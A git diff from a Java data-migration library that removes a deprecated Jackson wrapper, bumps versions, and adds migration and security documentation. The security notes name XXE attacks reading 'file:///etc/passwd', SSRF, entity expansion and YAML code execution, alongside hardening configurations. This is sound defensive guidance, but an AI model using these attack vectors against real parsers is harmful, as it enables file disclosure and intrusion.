Extracts the numeric value from a JSON node. The node must be a numeric node. - * This delegates to the underlying {@link JacksonJsonOps#getNumberValue(JsonNode)} method.

- * - * @param input the JSON node to extract the number from; must not be {@code null} - * @return a {@link DataResult} containing the {@link Number} value on success, - * or an error if the node is not a numeric node - */ - @NotNull - @Override - public DataResult getNumberValue(@NotNull final JsonNode input) { - Preconditions.checkNotNull(input, "input must not be null"); - return this.baseOps.getNumberValue(input); - } - - /** - * {@inheritDoc} - * - *

Extracts the boolean value from a JSON node. The node must be a boolean node. - * This delegates to the underlying {@link JacksonJsonOps#getBooleanValue(JsonNode)} method.

- * - * @param input the JSON node to extract the boolean from; must not be {@code null} - * @return a {@link DataResult} containing the boolean value on success, - * or an error if the node is not a boolean node - */ - @NotNull - @Override - public DataResult getBooleanValue(@NotNull final JsonNode input) { - Preconditions.checkNotNull(input, "input must not be null"); - return this.baseOps.getBooleanValue(input); - } - - // ==================== List Operations ==================== - - /** - * {@inheritDoc} - * - *

Creates a JSON array node from a stream of JSON nodes. - * This delegates to the underlying {@link JacksonJsonOps#createList(Stream)} method.

- * - * @param values the stream of JSON nodes to include in the array; must not be {@code null} - * @return a new {@link ArrayNode} containing all elements from the stream - */ - @NotNull - @Override - public JsonNode createList(@NotNull final Stream values) { - Preconditions.checkNotNull(values, "values must not be null"); - return this.baseOps.createList(values); - } - - /** - * {@inheritDoc} - * - *

Extracts the elements of a JSON array as a stream. The input must be an - * {@link ArrayNode}. This delegates to the underlying - * {@link JacksonJsonOps#getList(JsonNode)} method.

- * - * @param input the JSON node to extract list elements from; must not be {@code null} - * @return a {@link DataResult} containing a stream of the array elements on success, - * or an error if the input is not an array node - */ - @NotNull - @Override - public DataResult> getList(@NotNull final JsonNode input) { - Preconditions.checkNotNull(input, "input must not be null"); - return this.baseOps.getList(input); - } - - /** - * {@inheritDoc} - * - *

Creates a new JSON array by appending a value to an existing array. - * The original array is not modified; a deep copy is created. - * This delegates to the underlying - * {@link JacksonJsonOps#mergeToList(JsonNode, JsonNode)} method.

- * - * @param list the existing JSON array to append to; must not be {@code null} - * @param value the JSON node to append; must not be {@code null} - * @return a {@link DataResult} containing the new array with the appended value on success, - * or an error if the list is not an array node - */ - @NotNull - @Override - public DataResult mergeToList(@NotNull final JsonNode list, @NotNull final JsonNode value) { - Preconditions.checkNotNull(list, "list must not be null"); - Preconditions.checkNotNull(value, "value must not be null"); - return this.baseOps.mergeToList(list, value); - } - - // ==================== Map Operations ==================== - - /** - * {@inheritDoc} - * - *

Retrieves the value associated with a key from a JSON object. - * This delegates to the underlying {@link JacksonJsonOps#get(JsonNode, String)} method.

- * - * @param value the JSON object to retrieve from; must not be {@code null} - * @param key the key to look up; must not be {@code null} - * @return the JSON node associated with the key, or {@code null} if not present - * or if the input is not an object node - */ - @Override - public @Nullable JsonNode get(@NotNull final JsonNode value, @NotNull final String key) { - Preconditions.checkNotNull(value, "value must not be null"); - Preconditions.checkNotNull(key, "key must not be null"); - return this.baseOps.get(value, key); - } - - /** - * {@inheritDoc} - * - *

Creates a new JSON object with a field set to the specified value. - * If the input is an object node, a deep copy is created with the field updated. - * If the input is not an object node, a new object is created containing only the specified field. - * This delegates to the underlying - * {@link JacksonJsonOps#set(JsonNode, String, JsonNode)} method.

- * - * @param value the JSON node to modify; must not be {@code null} - * @param key the key for the field to set; must not be {@code null} - * @param newValue the value to associate with the key; must not be {@code null} - * @return a new {@link ObjectNode} with the field set to the specified value - */ - @NotNull - @Override - public JsonNode set(@NotNull final JsonNode value, @NotNull final String key, @NotNull final JsonNode newValue) { - Preconditions.checkNotNull(value, "value must not be null"); - Preconditions.checkNotNull(key, "key must not be null"); - return this.baseOps.set(value, key, newValue); - } - - /** - * {@inheritDoc} - * - *

Creates a new JSON object with a field removed. - * A deep copy of the input object is created without the specified field. - * This delegates to the underlying - * {@link JacksonJsonOps#remove(JsonNode, String)} method.

- * - * @param value the JSON object to modify; must not be {@code null} - * @param key the key of the field to remove; must not be {@code null} - * @return a new {@link ObjectNode} without the specified field - */ - @NotNull - @Override - public JsonNode remove(@NotNull final JsonNode value, @NotNull final String key) { - Preconditions.checkNotNull(value, "value must not be null"); - Preconditions.checkNotNull(key, "key must not be null"); - return this.baseOps.remove(value, key); - } - - /** - * {@inheritDoc} - * - *

Checks whether a JSON object contains a field with the specified key. - * This delegates to the underlying - * {@link JacksonJsonOps#has(JsonNode, String)} method.

- * - * @param value the JSON node to check; must not be {@code null} - * @param key the key to look for; must not be {@code null} - * @return {@code true} if the value is an {@link ObjectNode} and contains the specified key, - * {@code false} otherwise - */ - @Override - public boolean has(@NotNull final JsonNode value, @NotNull final String key) { - Preconditions.checkNotNull(value, "value must not be null"); - Preconditions.checkNotNull(key, "key must not be null"); - return this.baseOps.has(value, key); - } - - /** - * {@inheritDoc} - * - *

Creates a JSON object from a stream of key-value pairs. - * Keys must be text nodes; non-text keys are skipped. - * This delegates to the underlying {@link JacksonJsonOps#createMap(Stream)} method.

- * - * @param entries the stream of key-value pairs; must not be {@code null} - * @return a new {@link ObjectNode} containing all valid entries from the stream - */ - @NotNull - @Override - public JsonNode createMap(@NotNull final Stream> entries) { - Preconditions.checkNotNull(entries, "entries must not be null"); - return this.baseOps.createMap(entries); - } - - /** - * {@inheritDoc} - * - *

Extracts the entries of a JSON object as a stream of key-value pairs. - * This delegates to the underlying - * {@link JacksonJsonOps#getMapEntries(JsonNode)} method.

- * - * @param input the JSON node to extract entries from; must not be {@code null} - * @return a {@link DataResult} containing a stream of key-value pairs on success, - * or an error if the input is not an object node - */ - @NotNull - @Override - public DataResult>> getMapEntries(@NotNull final JsonNode input) { - Preconditions.checkNotNull(input, "input must not be null"); - return this.baseOps.getMapEntries(input); - } - - /** - * {@inheritDoc} - * - *

Creates a new JSON object by adding a key-value pair to an existing map. - * A deep copy of the input map is created with the new entry added. - * This delegates to the underlying - * {@link JacksonJsonOps#mergeToMap(JsonNode, JsonNode, JsonNode)} method.

- * - * @param map the existing JSON object; must not be {@code null} - * @param key the key for the new entry (must be a text node); must not be {@code null} - * @param value the value for the new entry; must not be {@code null} - * @return a {@link DataResult} containing the new object with the added entry on success, - * or an error if the map is not an object node or the key is not a text node - */ - @NotNull - @Override - public DataResult mergeToMap(@NotNull final JsonNode map, @NotNull final JsonNode key, @NotNull final JsonNode value) { - Preconditions.checkNotNull(map, "map must not be null"); - Preconditions.checkNotNull(key, "key must not be null"); - Preconditions.checkNotNull(value, "value must not be null"); - return this.baseOps.mergeToMap(map, key, value); - } - - /** - * {@inheritDoc} - * - *

Creates a new JSON object by merging two maps together. - * A deep copy of the first map is created, and all entries from the second map are added. - * Entries in the second map override entries with the same key in the first map. - * This delegates to the underlying - * {@link JacksonJsonOps#mergeToMap(JsonNode, JsonNode)} method.

- * - * @param map the base JSON object; must not be {@code null} - * @param other the JSON object to merge from; must not be {@code null} - * @return a {@link DataResult} containing the merged object on success, - * or an error if either argument is not an object node - */ - @NotNull - @Override - public DataResult mergeToMap(@NotNull final JsonNode map, @NotNull final JsonNode other) { - Preconditions.checkNotNull(map, "map must not be null"); - Preconditions.checkNotNull(other, "other must not be null"); - return this.baseOps.mergeToMap(map, other); - } - - // ==================== Conversion ==================== - - /** - * {@inheritDoc} - * - *

Converts data from another {@link DynamicOps} format to Jackson's {@link JsonNode}. - * Recursively converts primitives, lists, and maps to their Jackson equivalents. - * This delegates to the underlying - * {@link JacksonJsonOps#convertTo(DynamicOps, Object)} method.

- * - * @param the type parameter of the target format - * @param ops the target {@link DynamicOps} implementation; must not be {@code null} - * @param input the data to convert in the source format; must not be {@code null} - * @return the converted data as a Jackson {@link JsonNode} - */ - @NotNull - @Override - public JsonNode convertTo(@NotNull final DynamicOps ops, @NotNull final U input) { - Preconditions.checkNotNull(ops, "ops must not be null"); - Preconditions.checkNotNull(input, "input must not be null"); - return this.baseOps.convertTo(ops, input); - } - - /** - * Returns a string representation of this deprecated wrapper. - * - *

The returned string clearly indicates that this is a deprecated wrapper - * class and suggests using the new implementation instead.

- * - * @return a descriptive string indicating deprecated status and the recommended alternative - */ - @Override - public String toString() { - return "JacksonOps (deprecated, use JacksonJsonOps)"; - } -} diff --git a/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/jackson/package-info.java b/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/jackson/package-info.java deleted file mode 100644 index 73a5b8f..0000000 --- a/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/jackson/package-info.java +++ /dev/null @@ -1,135 +0,0 @@ -/* - * Copyright (c) 2025 Splatgames.de Software and Contributors - * - * Permission is hereby granted, free of charge, to any person obtaining a copy - * of this software and associated documentation files (the "Software"), to deal - * in the Software without restriction, including without limitation the rights - * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell - * copies of the Software, and to permit persons to whom the Software is - * furnished to do so, subject to the following conditions: - * - * The above copyright notice and this permission notice shall be included in all - * copies or substantial portions of the Software. - * - * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, - * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE - * SOFTWARE. - */ - -/** - * DEPRECATED: Legacy package for Jackson-based {@link de.splatgames.aether.datafixers.api.dynamic.DynamicOps} - * implementation. This package is retained only for backwards compatibility and will be removed in version 1.0.0. - * - *

This package contains the original {@link de.splatgames.aether.datafixers.codec.jackson.JacksonOps} class - * from the pre-0.4.0 package structure. All classes in this package are deprecated and delegate to their - * replacements in the reorganized {@link de.splatgames.aether.datafixers.codec.json.jackson} package.

- * - *

Migration Guide

- *

To migrate from this deprecated package to the new package structure:

- * - *

Import Changes

- *
{@code
- * // Old imports (deprecated, will be removed in 1.0.0)
- * import de.splatgames.aether.datafixers.codec.jackson.JacksonOps;
- *
- * // New imports (recommended)
- * import de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps;
- * }
- * - *

Code Changes

- *

The class has been renamed from {@code JacksonOps} to {@code JacksonJsonOps} for clarity:

- *
{@code
- * // Old code (deprecated)
- * JacksonOps ops = JacksonOps.INSTANCE;
- * JacksonOps customOps = new JacksonOps(customMapper);
- * Dynamic dynamic = new Dynamic<>(ops, jsonNode);
- *
- * // New code (recommended)
- * JacksonJsonOps ops = JacksonJsonOps.INSTANCE;
- * JacksonJsonOps customOps = new JacksonJsonOps(customMapper);
- * Dynamic dynamic = new Dynamic<>(ops, jsonNode);
- * }
- * - *

Deprecation Timeline

- * - * - * - * - * - * - *
Deprecation and Removal Schedule
VersionStatusAction Required
0.4.0DeprecatedUpdate imports and class names; old code continues to work
0.5.0DeprecatedWarnings during compilation; functionality unchanged
1.0.0RemovedPackage deleted; migration required before upgrade
- * - *

Why This Change?

- *

The package reorganization in version 0.4.0 introduced a cleaner, more scalable structure:

- *
    - *
  • Format-Based Organization: All JSON implementations are now grouped under - * {@code codec.json.*}, YAML under {@code codec.yaml.*}, etc.
  • - *
  • Library-Based Subpackages: Each format has subpackages for different - * libraries (e.g., {@code json.gson}, {@code json.jackson})
  • - *
  • Disambiguated Naming: {@code JacksonOps} is now {@code JacksonJsonOps} to - * distinguish it from {@code JacksonYamlOps}, {@code JacksonTomlOps}, and {@code JacksonXmlOps}
  • - *
- * - *

New Package Structure

- *
- * de.splatgames.aether.datafixers.codec
- * ├── json
- * │   ├── gson/GsonOps.java
- * │   └── jackson/JacksonJsonOps.java   (renamed from JacksonOps)
- * ├── yaml
- * │   ├── jackson/JacksonYamlOps.java   (new)
- * │   └── snakeyaml/SnakeYamlOps.java   (new)
- * ├── toml
- * │   └── jackson/JacksonTomlOps.java   (new)
- * └── xml
- *     └── jackson/JacksonXmlOps.java    (new)
- * 
- * - *

Class Mapping

- * - * - * - * - * - * - * - * - * - * - * - * - * - * - * - *
Old to New Class Mapping
Old Class (Deprecated)New Class (Recommended)
{@link de.splatgames.aether.datafixers.codec.jackson.JacksonOps}{@link de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps}
{@code JacksonOps.INSTANCE}{@link de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps#INSTANCE}
{@code new JacksonOps(mapper)}{@code new JacksonJsonOps(mapper)}
- * - *

Delegation Pattern

- *

The deprecated {@link de.splatgames.aether.datafixers.codec.jackson.JacksonOps} class uses the - * delegation pattern to forward all method calls to the new - * {@link de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps} implementation. This ensures:

- *
    - *
  • Identical behavior between deprecated and new implementations
  • - *
  • Bug fixes applied to the new implementation automatically benefit deprecated users
  • - *
  • No performance overhead beyond a single method delegation
  • - *
- * - *

Thread Safety

- *

All classes in this deprecated package maintain the same thread-safety guarantees as their - * replacements. The singleton {@link de.splatgames.aether.datafixers.codec.jackson.JacksonOps#INSTANCE} - * can be safely shared across multiple threads. Custom instances created with a custom - * {@link com.fasterxml.jackson.databind.ObjectMapper} are thread-safe if the provided mapper is thread-safe.

- * - * @author Erik Pförtner - * @see de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps - * @see de.splatgames.aether.datafixers.codec.json - * @see de.splatgames.aether.datafixers.api.dynamic.DynamicOps - * @since 0.1.0 - * @deprecated Since 0.4.0. Use classes from {@link de.splatgames.aether.datafixers.codec.json.jackson} - * instead. This package will be removed in version 1.0.0. - */ -@Deprecated(since = "0.4.0", forRemoval = true) -package de.splatgames.aether.datafixers.codec.jackson; diff --git a/aether-datafixers-core/pom.xml b/aether-datafixers-core/pom.xml index e01a286..76d216d 100644 --- a/aether-datafixers-core/pom.xml +++ b/aether-datafixers-core/pom.xml @@ -6,7 +6,7 @@ de.splatgames.aether.datafixers aether-datafixers - 0.5.0 + 1.0.0-SNAPSHOT aether-datafixers-core diff --git a/aether-datafixers-examples/pom.xml b/aether-datafixers-examples/pom.xml index aaf7610..23d7faa 100644 --- a/aether-datafixers-examples/pom.xml +++ b/aether-datafixers-examples/pom.xml @@ -7,7 +7,7 @@ de.splatgames.aether.datafixers aether-datafixers - 0.5.0 + 1.0.0-SNAPSHOT aether-datafixers-examples @@ -56,7 +56,7 @@ org.codehaus.mojo exec-maven-plugin - 3.1.0 + 3.6.3 de.splatgames.aether.datafixers.examples.game.GameExample diff --git a/aether-datafixers-functional-tests/pom.xml b/aether-datafixers-functional-tests/pom.xml index 9c0208c..4f4e7a3 100644 --- a/aether-datafixers-functional-tests/pom.xml +++ b/aether-datafixers-functional-tests/pom.xml @@ -1,25 +1,4 @@ - @@ -28,7 +7,7 @@ de.splatgames.aether.datafixers aether-datafixers - 0.5.0 + 1.0.0-SNAPSHOT aether-datafixers-functional-tests @@ -44,7 +23,7 @@ true - 3.4.1 + 3.5.10 diff --git a/aether-datafixers-schema-tools/pom.xml b/aether-datafixers-schema-tools/pom.xml index bab6ea2..ce4fc1e 100644 --- a/aether-datafixers-schema-tools/pom.xml +++ b/aether-datafixers-schema-tools/pom.xml @@ -7,7 +7,7 @@ de.splatgames.aether.datafixers aether-datafixers - 0.5.0 + 1.0.0-SNAPSHOT aether-datafixers-schema-tools diff --git a/aether-datafixers-spring-boot-starter/pom.xml b/aether-datafixers-spring-boot-starter/pom.xml index 4443770..122dc22 100644 --- a/aether-datafixers-spring-boot-starter/pom.xml +++ b/aether-datafixers-spring-boot-starter/pom.xml @@ -7,7 +7,7 @@ de.splatgames.aether.datafixers aether-datafixers - 0.5.0 + 1.0.0-SNAPSHOT aether-datafixers-spring-boot-starter @@ -18,7 +18,7 @@ DynamicOps integration, MigrationService with fluent API, and Actuator endpoints. - 3.4.1 + 3.5.10 diff --git a/aether-datafixers-testkit/pom.xml b/aether-datafixers-testkit/pom.xml index 98f4b67..dde9eb2 100644 --- a/aether-datafixers-testkit/pom.xml +++ b/aether-datafixers-testkit/pom.xml @@ -6,7 +6,7 @@ de.splatgames.aether.datafixers aether-datafixers - 0.5.0 + 1.0.0-SNAPSHOT aether-datafixers-testkit @@ -54,7 +54,7 @@ gson - + com.fasterxml.jackson.core jackson-databind diff --git a/aether-datafixers-testkit/src/main/java/de/splatgames/aether/datafixers/testkit/TestData.java b/aether-datafixers-testkit/src/main/java/de/splatgames/aether/datafixers/testkit/TestData.java index f67c78b..e5acf4c 100644 --- a/aether-datafixers-testkit/src/main/java/de/splatgames/aether/datafixers/testkit/TestData.java +++ b/aether-datafixers-testkit/src/main/java/de/splatgames/aether/datafixers/testkit/TestData.java @@ -139,21 +139,6 @@ public static TestDataBuilder gson() { return new TestDataBuilder<>(GsonOps.INSTANCE); } - /** - * Creates a builder using {@link JacksonJsonOps}. - * - *

Use this when testing with Jackson's JSON representation.

- * - * @return a new {@link TestDataBuilder} for Jackson JSON - * @deprecated Since 0.5.0. Use {@link #jacksonJson()} instead for explicit format naming. - * This method will be removed in version 1.0.0. - */ - @Deprecated(forRemoval = true, since = "0.5.0") - @NotNull - public static TestDataBuilder jackson() { - return jacksonJson(); - } - /** * Creates a builder using {@link JacksonJsonOps}. * diff --git a/aether-datafixers-testkit/src/test/java/de/splatgames/aether/datafixers/testkit/TestDataTest.java b/aether-datafixers-testkit/src/test/java/de/splatgames/aether/datafixers/testkit/TestDataTest.java index 7f03785..04dd795 100644 --- a/aether-datafixers-testkit/src/test/java/de/splatgames/aether/datafixers/testkit/TestDataTest.java +++ b/aether-datafixers-testkit/src/test/java/de/splatgames/aether/datafixers/testkit/TestDataTest.java @@ -264,17 +264,6 @@ void jacksonJsonCreatesJacksonJsonBuilder() { assertThat(dynamic.ops()).isSameAs(JacksonJsonOps.INSTANCE); } - @Test - @DisplayName("jackson() creates Jackson JSON builder (deprecated)") - @SuppressWarnings("deprecation") - void jacksonCreatesJacksonJsonBuilder() { - final Dynamic dynamic = TestData.jackson().object() - .put("key", "value") - .build(); - - assertThat(dynamic.get("key").asString().result()).hasValue("value"); - } - @Test @DisplayName("snakeYaml() creates SnakeYAML builder") void snakeYamlCreatesSnakeYamlBuilder() { diff --git a/docs/README.md b/docs/README.md index 482fbf0..56077c0 100644 --- a/docs/README.md +++ b/docs/README.md @@ -123,6 +123,16 @@ For experienced users: - [Performance Optimization](advanced/performance-optimization.md) - [Extending the Framework](advanced/extending-framework.md) +### Security + +Guidance for processing untrusted data safely: + +- [Security Overview](security/index.md) — Introduction to security considerations +- [Threat Model](security/threat-model.md) — Attack vectors and trust boundaries +- [Format Security](security/format-considerations/index.md) — Per-format security guidance +- [Best Practices](security/best-practices.md) — Secure configuration patterns +- [Secure Configuration Examples](security/secure-configuration-examples.md) — Ready-to-use examples + ### Spring Boot Integration Seamlessly integrate Aether Datafixers into Spring Boot applications: @@ -138,6 +148,7 @@ Seamlessly integrate Aether Datafixers into Spring Boot applications: ### Support - [Troubleshooting](troubleshooting/index.md) +- [Migration Guide](migration/index.md) - [Common Errors](troubleshooting/common-errors.md) - [FAQ](troubleshooting/faq.md) - [Glossary](appendix/glossary.md) diff --git a/docs/appendix/glossary.md b/docs/appendix/glossary.md index 5bb793f..2f2af82 100644 --- a/docs/appendix/glossary.md +++ b/docs/appendix/glossary.md @@ -140,7 +140,7 @@ Terminology used in Aether Datafixers. : Test harness for validating Schema configurations. **TestData** -: Entry point for fluent test data builders (TestData.gson(), TestData.jackson()). +: Entry point for fluent test data builders (TestData.gson(), TestData.jacksonJson()). **TestDataBuilder** : Fluent builder for creating Dynamic objects with fields. diff --git a/docs/codec/xml.md b/docs/codec/xml.md index c50d77c..35e14cd 100644 --- a/docs/codec/xml.md +++ b/docs/codec/xml.md @@ -338,6 +338,38 @@ DataResult result = ServerConfig.CODEC.decode(JacksonXmlOps.INSTAN ServerConfig config = result.getOrThrow(); ``` +## Security Considerations + +> **WARNING:** XML processing is vulnerable to **XXE (XML External Entity)** attacks. +> When processing untrusted XML, you **MUST** configure the `XmlMapper` to disable +> external entity processing. + +**XXE attacks can:** +- Read local files (`file:///etc/passwd`) +- Perform Server-Side Request Forgery (SSRF) +- Cause Denial of Service through entity expansion (Billion Laughs) + +**Secure configuration for untrusted XML:** + +```java +XMLInputFactory xmlInputFactory = XMLInputFactory.newFactory(); +xmlInputFactory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false); +xmlInputFactory.setProperty(XMLInputFactory.SUPPORT_DTD, false); +xmlInputFactory.setProperty(XMLInputFactory.IS_REPLACING_ENTITY_REFERENCES, false); + +XmlMapper secureMapper = XmlMapper.builder( + XmlFactory.builder() + .xmlInputFactory(xmlInputFactory) + .build() +).build(); + +JacksonXmlOps secureOps = new JacksonXmlOps(secureMapper); +``` + +For detailed security guidance and configuration examples, see [Jackson XML Security](../security/format-considerations/jackson.md#xxe-prevention). + +--- + ## Best Practices 1. **Use Simple Structures** - Jackson XML works best with simple, well-structured XML diff --git a/docs/codec/yaml.md b/docs/codec/yaml.md index 33f997f..3ef29e4 100644 --- a/docs/codec/yaml.md +++ b/docs/codec/yaml.md @@ -132,6 +132,32 @@ Yaml yaml = new Yaml(new SafeConstructor(loaderOptions)); Object data = yaml.load(untrustedYaml); ``` +## Security Considerations + +> **WARNING:** When loading YAML from untrusted sources, you **MUST** use `SafeConstructor` +> to prevent arbitrary code execution attacks. The default `Yaml()` constructor allows +> instantiation of arbitrary Java classes, which can lead to **Remote Code Execution (RCE)**. + +**Critical security measures for untrusted YAML:** + +1. **Always use `SafeConstructor`** — Prevents arbitrary class instantiation +2. **Limit alias expansion** — Set `maxAliasesForCollections` to prevent Billion Laughs attacks +3. **Limit nesting depth** — Set `nestingDepthLimit` to prevent stack overflow +4. **Limit input size** — Set `codePointLimit` to prevent memory exhaustion + +```java +// Secure configuration for untrusted YAML +LoaderOptions options = new LoaderOptions(); +options.setMaxAliasesForCollections(50); +options.setNestingDepthLimit(50); +options.setCodePointLimit(3 * 1024 * 1024); +options.setAllowDuplicateKeys(false); + +Yaml safeYaml = new Yaml(new SafeConstructor(options)); +``` + +For detailed security guidance, see [SnakeYAML Security](../security/format-considerations/snakeyaml.md). + ### Data Types SnakeYamlOps works with native Java types: diff --git a/docs/migration/index.md b/docs/migration/index.md new file mode 100644 index 0000000..eccbd6d --- /dev/null +++ b/docs/migration/index.md @@ -0,0 +1,25 @@ +# Migration Guides + +This section contains guides for upgrading between major versions of Aether Datafixers. + +## Available Guides + +| From | To | Guide | +|--------|--------|------------------------------------| +| v0.5.x | v1.0.0 | [Migration Guide](v0.5-to-v1.0.md) | + +## Before You Migrate + +1. **Back up your project** — Create a commit or backup before starting +2. **Read the full guide** — Understand all changes before making modifications +3. **Update dependencies first** — Ensure your build file references the new version +4. **Run tests after** — Verify your migrations still work correctly + +## General Migration Strategy + +1. Update the version in your build file (`pom.xml` or `build.gradle`) +2. Attempt to compile — note all compilation errors +3. Apply automated migration patterns from the guide +4. Fix any remaining issues manually +5. Run your test suite +6. Enable deprecation warnings to catch deprecated API usage diff --git a/docs/migration/v0.5-to-v1.0.md b/docs/migration/v0.5-to-v1.0.md new file mode 100644 index 0000000..c1199e3 --- /dev/null +++ b/docs/migration/v0.5-to-v1.0.md @@ -0,0 +1,348 @@ +# Migration Guide: v0.5.x to v1.0.0 + +This guide helps you migrate your project from Aether Datafixers v0.5.x to v1.0.0. It covers breaking changes, step-by-step migration instructions, and automated migration patterns. + +## Overview + +Version 1.0.0 introduces breaking changes to improve the codec package organization and API clarity. This guide will help you update your codebase with minimal effort. + +| Change Type | Component | Impact | +|-----------------|-------------------------|---------------------------------------------------| +| **Breaking** | Codec package structure | Import statements must be updated | +| **Breaking** | `JacksonOps` rename | Class renamed to `JacksonJsonOps` | +| **Breaking** | `TestData.jackson()` | Method renamed to `TestData.jacksonJson()` | +| **Deprecation** | Rules traversal methods | Single-argument overloads deprecated (still work) | + +--- + +## Breaking Changes + +### 1. Codec Package Restructuring + +The codec module has been reorganized to better reflect the supported formats (JSON, YAML, TOML, XML). + +**Before (v0.5.x):** +```java +import de.splatgames.aether.datafixers.codec.gson.GsonOps; +import de.splatgames.aether.datafixers.codec.jackson.JacksonOps; +``` + +**After (v1.0.0):** +```java +import de.splatgames.aether.datafixers.codec.json.gson.GsonOps; +import de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps; +``` + +**Rationale:** The new package structure groups implementations by format type (`json`, `yaml`, `toml`, `xml`) rather than by library. This makes it easier to discover all available JSON implementations and aligns with the YAML/TOML/XML naming conventions. + +**Complete Package Mapping:** + +| Old Package (v0.5.x) | New Package (v1.0.0) | +|----------------------------|-------------------------------------| +| `codec.gson.GsonOps` | `codec.json.gson.GsonOps` | +| `codec.jackson.JacksonOps` | `codec.json.jackson.JacksonJsonOps` | + +### 2. JacksonOps Class Rename + +The `JacksonOps` class has been renamed to `JacksonJsonOps` to distinguish it from other Jackson-based implementations. + +**Before (v0.5.x):** +```java +Dynamic dynamic = new Dynamic<>(JacksonOps.INSTANCE, jsonNode); +``` + +**After (v1.0.0):** +```java +Dynamic dynamic = new Dynamic<>(JacksonJsonOps.INSTANCE, jsonNode); +``` + +**Rationale:** With the introduction of `JacksonYamlOps`, `JacksonTomlOps`, and `JacksonXmlOps`, the generic name `JacksonOps` was ambiguous. The suffix `JsonOps` makes it clear which format is being used. + +### 3. TestData Method Rename + +The `TestData.jackson()` method has been renamed to `TestData.jacksonJson()`. + +**Before (v0.5.x):** +```java +Dynamic testData = TestData.jackson() + .put("name", "Alice") + .put("level", 42) + .build(); +``` + +**After (v1.0.0):** +```java +Dynamic testData = TestData.jacksonJson() + .put("name", "Alice") + .put("level", 42) + .build(); +``` + +**Rationale:** Consistency with `jacksonYaml()`, `jacksonToml()`, and `jacksonXml()` methods. + +--- + +## Deprecations (Non-Breaking) + +### Rules Traversal Methods + +The single-argument overloads of traversal methods are deprecated but **not removed**. Your code will still compile and run, but you'll see deprecation warnings. + +**Deprecated Methods:** +- `Rules.all(rule)` — use `Rules.all(ops, rule)` +- `Rules.one(rule)` — use `Rules.one(ops, rule)` +- `Rules.everywhere(rule)` — use `Rules.everywhere(ops, rule)` +- `Rules.bottomUp(rule)` — use `Rules.bottomUp(ops, rule)` +- `Rules.topDown(rule)` — use `Rules.topDown(ops, rule)` + +**Why migrate?** The deprecated methods are **no-ops** that don't actually traverse children. They exist only for API compatibility. To get proper child traversal behavior, you must provide a `DynamicOps` instance. + +**Before (deprecated):** +```java +TypeRewriteRule rule = Rules.everywhere( + Rules.renameField("player", "name", "username") +); +``` + +**After (recommended):** +```java +TypeRewriteRule rule = Rules.everywhere(GsonOps.INSTANCE, + Rules.renameField("player", "name", "username") +); +``` + +--- + +## Automated Migration + +### IntelliJ IDEA (Regex Search & Replace) + +Use **Edit → Find → Replace in Files** (Ctrl+Shift+R / Cmd+Shift+R) with **Regex** enabled. + +#### GsonOps Import +- **Find:** `import de\.splatgames\.aether\.datafixers\.codec\.gson\.GsonOps;` +- **Replace:** `import de.splatgames.aether.datafixers.codec.json.gson.GsonOps;` + +#### JacksonOps Import and Class Name +- **Find:** `import de\.splatgames\.aether\.datafixers\.codec\.jackson\.JacksonOps;` +- **Replace:** `import de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps;` + +Then replace all usages: +- **Find:** `JacksonOps\.INSTANCE` +- **Replace:** `JacksonJsonOps.INSTANCE` + +And the type reference: +- **Find:** `JacksonOps(?!Json)` +- **Replace:** `JacksonJsonOps` + +#### TestData.jackson() +- **Find:** `TestData\.jackson\(\)` +- **Replace:** `TestData.jacksonJson()` + +#### Rules Methods (Optional - for deprecation cleanup) +- **Find:** `Rules\.(all|one|everywhere|bottomUp|topDown)\((?!.*DynamicOps)(\w+)\)` +- **Replace:** `Rules.$1(GsonOps.INSTANCE, $2)` + +**Note:** The Rules regex assumes you want to use `GsonOps.INSTANCE`. Adjust the replacement if you use a different `DynamicOps` implementation. + +--- + +### VS Code (Regex Search & Replace) + +Use **Edit → Replace in Files** (Ctrl+Shift+H / Cmd+Shift+H) with **Regex** enabled (Alt+R). + +The same patterns work in VS Code: + +| Find | Replace | +|--------------------------------------------------------------------------|-----------------------------------------------------------------------------| +| `import de\.splatgames\.aether\.datafixers\.codec\.gson\.GsonOps;` | `import de.splatgames.aether.datafixers.codec.json.gson.GsonOps;` | +| `import de\.splatgames\.aether\.datafixers\.codec\.jackson\.JacksonOps;` | `import de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps;` | +| `JacksonOps\.INSTANCE` | `JacksonJsonOps.INSTANCE` | +| `TestData\.jackson\(\)` | `TestData.jacksonJson()` | + +--- + +### Command Line (sed) + +For batch migration across multiple files: + +```bash +# GsonOps import +find . -name "*.java" -exec sed -i 's/import de\.splatgames\.aether\.datafixers\.codec\.gson\.GsonOps;/import de.splatgames.aether.datafixers.codec.json.gson.GsonOps;/g' {} + + +# JacksonOps import +find . -name "*.java" -exec sed -i 's/import de\.splatgames\.aether\.datafixers\.codec\.jackson\.JacksonOps;/import de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps;/g' {} + + +# JacksonOps class name +find . -name "*.java" -exec sed -i 's/JacksonOps\.INSTANCE/JacksonJsonOps.INSTANCE/g' {} + +find . -name "*.java" -exec sed -i 's/JacksonOps\([^J]\)/JacksonJsonOps\1/g' {} + + +# TestData.jackson() +find . -name "*.java" -exec sed -i 's/TestData\.jackson()/TestData.jacksonJson()/g' {} + +``` + +**macOS Note:** Use `sed -i ''` instead of `sed -i` on macOS. + 